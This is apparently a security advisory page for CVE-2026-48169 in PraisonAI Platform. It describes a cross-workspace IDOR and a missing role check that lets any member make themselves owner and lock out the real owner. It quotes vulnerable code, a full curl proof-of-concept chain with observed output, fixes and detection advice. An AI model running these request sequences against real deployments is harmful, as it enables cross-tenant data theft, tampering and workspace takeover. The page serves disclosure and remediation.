PraisonAI Platform (≤0.1.2) exposes two chained authorization failures: a service-layer IDOR that lets any authenticated user read, modify, and delete data across all workspace boundaries by swapping resource UUIDs, and a missing role-enforcement gap that lets any workspace member self-promote to owner and expel the original owner with no recovery path. The blast radius is platform-wide — every tenant's AI agent configurations, project data, and operational details are accessible to any valid account holder, breaking multi-tenancy entirely. Although not in CISA KEV and EPSS data is unavailable, the advisory includes a complete working PoC requiring only low-privilege credentials and standard HTTP requests, and the 59 prior CVEs in the same package signal a pattern of authorization weaknesses in this codebase. Upgrade to praisonai-platform 0.1.4 immediately, audit all workspace owner memberships for unexpected promotions, and treat any ownership changes since deployment as potential indicators of compromise.
What is the risk?
HIGH risk. CVSS 8.8 (AV:N/AC:L/PR:L/UI:N) means this is remotely exploitable by any low-privilege authenticated user with no interaction required. Multi-tenant isolation is completely nullified — a single malicious or compromised low-privilege account can enumerate and exfiltrate all workspace data platform-wide. The privilege escalation is irreversible without direct database intervention, as there is no super-admin role and no last-owner protection. Exploitation requires no specialized AI or security knowledge; the PoC is curl commands. The 59 other CVEs in this package family suggest systemic authorization hygiene issues that may extend beyond the patched paths.
Attack Kill Chain
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| praisonai | pip | — | No patch |
| praisonai-platform | pip | <= 0.1.2 | 0.1.4 |
Severity & Risk
Attack Surface
What should I do?
5 steps-
Patch: Upgrade praisonai-platform to ≥0.1.4 immediately — this is the only complete fix.
-
Audit memberships: Query workspace member tables for any role='owner' entries where the user was not the workspace creator; treat unexpected owner accounts as active compromise.
-
Network controls: If patching is delayed, restrict API access to trusted IP ranges or require VPN for all /api/v1/workspaces/* endpoints.
-
Detection: Enable API logging and alert on responses where the workspace_id in the response body differs from the workspace_id in the request URL path; also alert on PATCH /workspaces/{id}/members/* calls from non-owner accounts.
-
Incident response: Rotate all credentials, API keys, and secrets stored within affected workspace issues or projects, as these must be treated as compromised.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-48169?
PraisonAI Platform (≤0.1.2) exposes two chained authorization failures: a service-layer IDOR that lets any authenticated user read, modify, and delete data across all workspace boundaries by swapping resource UUIDs, and a missing role-enforcement gap that lets any workspace member self-promote to owner and expel the original owner with no recovery path. The blast radius is platform-wide — every tenant's AI agent configurations, project data, and operational details are accessible to any valid account holder, breaking multi-tenancy entirely. Although not in CISA KEV and EPSS data is unavailable, the advisory includes a complete working PoC requiring only low-privilege credentials and standard HTTP requests, and the 59 prior CVEs in the same package signal a pattern of authorization weaknesses in this codebase. Upgrade to praisonai-platform 0.1.4 immediately, audit all workspace owner memberships for unexpected promotions, and treat any ownership changes since deployment as potential indicators of compromise.
Is CVE-2026-48169 actively exploited?
No confirmed active exploitation of CVE-2026-48169 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-48169?
1. Patch: Upgrade praisonai-platform to ≥0.1.4 immediately — this is the only complete fix. 2. Audit memberships: Query workspace member tables for any role='owner' entries where the user was not the workspace creator; treat unexpected owner accounts as active compromise. 3. Network controls: If patching is delayed, restrict API access to trusted IP ranges or require VPN for all /api/v1/workspaces/* endpoints. 4. Detection: Enable API logging and alert on responses where the workspace_id in the response body differs from the workspace_id in the request URL path; also alert on PATCH /workspaces/{id}/members/* calls from non-owner accounts. 5. Incident response: Rotate all credentials, API keys, and secrets stored within affected workspace issues or projects, as these must be treated as compromised.
What systems are affected by CVE-2026-48169?
This vulnerability affects the following AI/ML architecture patterns: AI agent platforms, Multi-tenant SaaS deployments, Collaborative AI workspaces, Agent orchestration frameworks.
What is the CVSS score for CVE-2026-48169?
CVE-2026-48169 has a CVSS v3.1 base score of 8.8 (HIGH).
AI Security Impact
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0012 Valid Accounts AML.T0025 Exfiltration via Cyber Means AML.T0048.003 User Harm AML.T0049 Exploit Public-Facing Application AML.T0085 Data from AI Services Compliance Controls Affected
Technical Details
Original Advisory
### Summary The PraisonAI Platform API has two authorization failures that together break workspace isolation. The service layer for issues and projects performs global primary-key lookups without checking workspace ownership, so any authenticated user can read, modify, and delete resources in any workspace just by swapping UUIDs in their API requests. On top of that, every member management endpoint (add, update role, remove) only requires `min_role="member"`, which lets any workspace member promote themselves to owner and kick out the original owner. A low-privilege member of one workspace can steal data from every other workspace and take over any workspace they belong to. Both issues come from the same gap: the route layer pulls `workspace_id` from the URL and verifies membership, but the service layer ignores the workspace scope for resource lookups and ignores the caller's role level for member operations. The `require_workspace_member()` dependency does its job correctly. The problem is that the service layer doesn't use the information it provides. ### Details #### Part 1: Cross-Workspace IDOR (Issues and Projects) **Vulnerable Files:** - `praisonai_platform/services/issue_service.py` - `praisonai_platform/services/project_service.py` - `praisonai_platform/api/routes/issues.py` - `praisonai_platform/api/routes/projects.py` There is a consistent split between the route layer and the service layer. Routes pull `workspace_id` from the URL and verify membership: ``` GET /api/v1/workspaces/{workspace_id}/issues/{issue_id} ^^^^^^^^^^^^^^ require_workspace_member() checks this ``` But the service methods these routes call perform global lookups that ignore `workspace_id` entirely: **IssueService.get(), line 72:** ```python async def get(self, issue_id: str) -> Optional[Issue]: """Get issue by ID.""" return await self._session.get(Issue, issue_id) ``` **ProjectService.get(), line 47:** ```python async def get(self, project_id: str) -> Optional[Project]: """Get project by ID.""" return await self._session.get(Project, project_id) ``` Both use `session.get(Model, pk)`, which is a global lookup by primary key with no `WHERE workspace_id = ?` filter. Compare that with the properly scoped `list_for_workspace()` methods in the same files: **IssueService.list_for_workspace(), line 76:** ```python async def list_for_workspace(self, workspace_id: str, ...) -> list[Issue]: stmt = select(Issue).where(Issue.workspace_id == workspace_id) # ... properly scoped ``` The listing is scoped correctly. The get, update, and delete methods are not. Since `update()` and `delete()` in both services call `self.get()` internally, the workspace bypass cascades through all write operations too. **Route that discards workspace_id, issues.py line 82:** ```python @router.get("/{issue_id}", response_model=IssueResponse) async def get_issue( workspace_id: str, # Extracted from URL issue_id: str, user: AuthIdentity = Depends(require_workspace_member), # Membership verified session: AsyncSession = Depends(get_db), ): svc = IssueService(session) issue = await svc.get(issue_id) # workspace_id never passed to service ``` **All affected operations:** | Service | Method | Line | Workspace scoped? | |---------|--------|------|-------------------| | IssueService | `get()` | 72 | No, uses `session.get(Issue, issue_id)` | | IssueService | `update()` | 97 | No, calls `self.get(issue_id)` | | IssueService | `delete()` | 150 | No, calls `self.get(issue_id)` | | IssueService | `list_for_workspace()` | 76 | **Yes**, filters by `workspace_id` | | ProjectService | `get()` | 47 | No, uses `session.get(Project, project_id)` | | ProjectService | `update()` | 62 | No, calls `self.get(project_id)` | | ProjectService | `delete()` | 88 | No, calls `self.get(project_id)` | | ProjectService | `get_stats()` | 97 | No, only filters by `project_id` | | ProjectService | `list_for_workspace()` | 51 | **Yes**, filters by `workspace_id` | #### Part 2: Workspace Takeover via Missing Role Enforcement **Vulnerable Files:** - `praisonai_platform/api/routes/workspaces.py` (member management routes) - `praisonai_platform/api/deps.py` (authorization dependency) - `praisonai_platform/services/member_service.py` (role hierarchy implementation) The authorization dependency supports role-based access: **require_workspace_member(), deps.py line 54:** ```python async def require_workspace_member( workspace_id: str, user: AuthIdentity = Depends(get_current_user), session: AsyncSession = Depends(get_db), min_role: str = "member", # Accepts higher roles, but nobody passes them ) -> AuthIdentity: member_svc = MemberService(session) has = await member_svc.has_role(workspace_id, user.id, min_role) if not has: raise HTTPException(status_code=403, ...) ``` The `has_role()` method correctly implements role hierarchy: **MemberService.has_role(), member_service.py line 80:** ```python async def has_role(self, workspace_id, user_id, required_role) -> bool: """Role hierarchy: owner > admin > member.""" member = await self.get(workspace_id, user_id) if member is None: return False role_levels = {"owner": 3, "admin": 2, "member": 1} user_level = role_levels.get(member.role, 0) required_level = role_levels.get(required_role, 0) return user_level >= required_level ``` This works correctly, but no route ever calls `require_workspace_member` with `min_role="owner"` or `min_role="admin"`. Every member management route uses the default `"member"`: **Self-promotion, workspaces.py line 115:** ```python @router.patch("/{workspace_id}/members/{user_id}", response_model=MemberResponse) async def update_member_role( workspace_id: str, user_id: str, body: MemberUpdate, user: AuthIdentity = Depends(require_workspace_member), # min_role="member" session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) member = await member_svc.update_role(workspace_id, user_id, body.role) # No check: is user modifying their own role? (self-promotion) # No check: is body.role > caller's current role? (escalation) # No check: is target a higher role than caller? (modifying superiors) ``` **Owner removal, workspaces.py line 130:** ```python @router.delete("/{workspace_id}/members/{user_id}", status_code=204) async def remove_member( workspace_id: str, user_id: str, user: AuthIdentity = Depends(require_workspace_member), # min_role="member" ... ): member_svc = MemberService(session) removed = await member_svc.remove(workspace_id, user_id) # No check: is target a higher role than caller? # No check: is this the last owner? ``` Three checks are missing from `update_member_role`: self-modification, upward escalation, and modifying superiors. Two checks are missing from `remove_member`: role hierarchy and last-owner protection. ### PoC **Prerequisites:** - A running PraisonAI Platform instance with default configuration - No special configuration required **Server setup:** ```bash cd /path/to/PraisonAI pip install -e "src/praisonai-platform" python -m uvicorn praisonai_platform.api.app:create_app \ --factory --host 127.0.0.1 --port 8000 ``` #### Scenario: Full attack chain (IDOR + Privilege Escalation) **Step 1: Victim (CEO) creates workspace with sensitive data** ```bash BASE="http://127.0.0.1:8000/api/v1" # Register CEO VICTIM=$(curl -sfL -X POST "$BASE/auth/register" \ -H "Content-Type: application/json" \ -d '{"email":"ceo@targetcorp.com","password":"Secure123!","name":"CEO"}') VICTIM_TOKEN=$(echo "$VICTIM" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") VICTIM_ID=$(echo "$VICTIM" | python3 -c "import sys,json; print(json.load(sys.stdin)['user']['id'])") # CEO creates workspace with confidential issue VICTIM_WS=$(curl -sfL -X POST "$BASE/workspaces/" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $VICTIM_TOKEN" \ -d '{"name":"Executive Board"}' \ | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])") ISSUE_ID=$(curl -sfL -X POST "$BASE/workspaces/$VICTIM_WS/issues/" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $VICTIM_TOKEN" \ -d '{"title":"M&A Target List","description":"Acquiring CompanyX for $2B. Board approved. Do not disclose."}' \ | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])") echo "Victim workspace: $VICTIM_WS" echo "Secret issue: $ISSUE_ID" ``` **Step 2: Attacker registers and creates their own workspace** ```bash ATTACKER=$(curl -sfL -X POST "$BASE/auth/register" \ -H "Content-Type: application/json" \ -d '{"email":"attacker@evil.com","password":"Evil123!","name":"Attacker"}') ATK_TOKEN=$(echo "$ATTACKER" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") ATK_ID=$(echo "$ATTACKER" | python3 -c "import sys,json; print(json.load(sys.stdin)['user']['id'])") ATK_WS=$(curl -sfL -X POST "$BASE/workspaces/" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $ATK_TOKEN" \ -d '{"name":"Attacker WS"}' \ | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])") ``` **Step 3: IDOR - Attacker reads victim's confidential issue through their own workspace** ```bash curl -sfL "$BASE/workspaces/$ATK_WS/issues/$ISSUE_ID" \ -H "Authorization: Bearer $ATK_TOKEN" ``` **Observed output (HTTP 200):** ```json { "id": "<ISSUE_ID>", "workspace_id": "<VICTIM_WS>", "title": "M&A Target List", "description": "Acquiring CompanyX for $2B. Board approved. Do not disclose.", "status": "backlog" } ``` The response contains the victim's `workspace_id`, which is different from the workspace in the request URL. The request was scoped to `$ATK_WS` but returned data from `$VICTIM_WS`. **Step 4: IDOR - Attacker modifies victim's issue** ```bash curl -sfL -X PATCH "$BASE/workspaces/$ATK_WS/issues/$ISSUE_ID" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $ATK_TOKEN" \ -d '{"title":"TAMPERED - M&A Target List"}' ``` **Observed output (HTTP 200):** Title updated across workspace boundary. **Step 5: Privilege escalation - CEO adds attacker as member (simulating invite)** ```bash curl -sfL -X POST "$BASE/workspaces/$VICTIM_WS/members/" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $VICTIM_TOKEN" \ -d "{\"user_id\":\"$ATK_ID\",\"role\":\"member\"}" > /dev/null ``` **Step 6: Privilege escalation - Member promotes self to owner** ```bash PROMO=$(curl -sfL -X PATCH "$BASE/workspaces/$VICTIM_WS/members/$ATK_ID" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer $ATK_TOKEN" \ -d '{"role":"owner"}') echo "$PROMO" | python3 -c "import sys,json; d=json.load(sys.stdin); print(f'Role: {d[\"role\"]}')" ``` **Observed output:** ``` Role: owner ``` The member used their own member-level token to promote themselves to owner. **Step 7: Privilege escalation - Attacker removes original owner** ```bash curl -sLo /dev/null -w "HTTP %{http_code}" -X DELETE \ "$BASE/workspaces/$VICTIM_WS/members/$VICTIM_ID" \ -H "Authorization: Bearer $ATK_TOKEN" ``` **Observed output:** `HTTP 204` - CEO removed from their own workspace. **Step 8: Verify - Attacker is sole owner** ```bash curl -sfL "$BASE/workspaces/$VICTIM_WS/members/" \ -H "Authorization: Bearer $ATK_TOKEN" ``` **Observed output:** ```json [ { "workspace_id": "<VICTIM_WS>", "user_id": "<ATK_ID>", "role": "owner" } ] ``` The CEO is locked out. The attacker is now the sole owner of "Executive Board" and all its data. ### Impact - **Complete multi-tenant data breach:** Any authenticated user can read every issue and project across all workspaces by substituting resource UUIDs. The URL structure (`/workspaces/{workspace_id}/...`) implies tenant isolation but provides none. - **Cross-workspace data tampering:** An attacker can modify issue titles, descriptions, statuses, assignments, and project fields across workspace boundaries. - **Cross-workspace data deletion:** An attacker can delete issues and projects belonging to other workspaces. - **Workspace takeover from member role:** Any member can self-promote to owner and remove all other owners, gaining sole control of the workspace and everything in it. - **No recovery mechanism:** After takeover, the original owner cannot access or recover their workspace. There is no super-admin role, no audit-based rollback, and no last-owner protection. - **Chain amplifies impact:** The IDOR does not require membership in the target workspace, only membership in any workspace. The privilege escalation turns that foothold into full ownership. Together, a user with a single member-level invite to any workspace can read all data platform-wide and take ownership of any workspace they are invited to. --- ## Suggested Fix **1. Scope all service get/update/delete methods to workspace_id** ```python # issue_service.py, replace get() at line 72: async def get(self, issue_id: str, workspace_id: str) -> Optional[Issue]: """Get issue by ID, scoped to workspace.""" issue = await self._session.get(Issue, issue_id) if issue is None or issue.workspace_id != workspace_id: return None return issue # Apply the same pattern to update(), delete(), and all ProjectService methods ``` **2. Pass workspace_id from routes to services** ```python # issues.py, fix get_issue at line 82: issue = await svc.get(issue_id, workspace_id) # Now workspace-scoped ``` **3. Require owner role for member management and add escalation guards** ```python # workspaces.py, fix update_member_role: user: AuthIdentity = Depends( lambda **kw: require_workspace_member(**kw, min_role="owner") ) # Add self-modification and last-owner guards: if user_id == user.id: raise HTTPException(403, "Cannot change your own role") # Fix remove_member: target = await member_svc.get(workspace_id, user_id) if target and target.role == "owner": owners = [m for m in await member_svc.list_members(workspace_id) if m.role == "owner"] if len(owners) <= 1: raise HTTPException(403, "Cannot remove the last owner") ```
Exploitation Scenario
An adversary joins a target PraisonAI Platform instance as a member of any workspace — either by registration or by accepting an invite. They observe resource UUIDs (issue IDs, project IDs) from their own workspace in API responses, then replay GET and PATCH requests against those same routes substituting UUIDs from other workspaces they enumerate or guess. The service layer performs a global primary-key lookup with no workspace filter, returning confidential AI agent configurations, system prompts, API credentials, and M&A or operational data stored as issues in unrelated tenants. If the adversary is subsequently invited as a member to any specific high-value workspace, they issue a single PATCH /workspaces/{id}/members/{self_id} call with role='owner', follow with DELETE /workspaces/{id}/members/{owner_id} to remove the legitimate owner, and assume permanent sole ownership of the workspace and all its AI agent tooling.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-47392 9.9 praisonaiagents: RCE via Python sandbox bypass
Same package: praisonai GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonai CVE-2026-39890 9.8 PraisonAI: YAML deserialization enables unauthenticated RCE
Same package: praisonai GHSA-9qhq-v63v-fv3j 9.8 PraisonAI: RCE via MCP command injection
Same package: praisonai CVE-2026-47410 9.8 praisonai-platform: hardcoded JWT → full account takeover
Same package: praisonai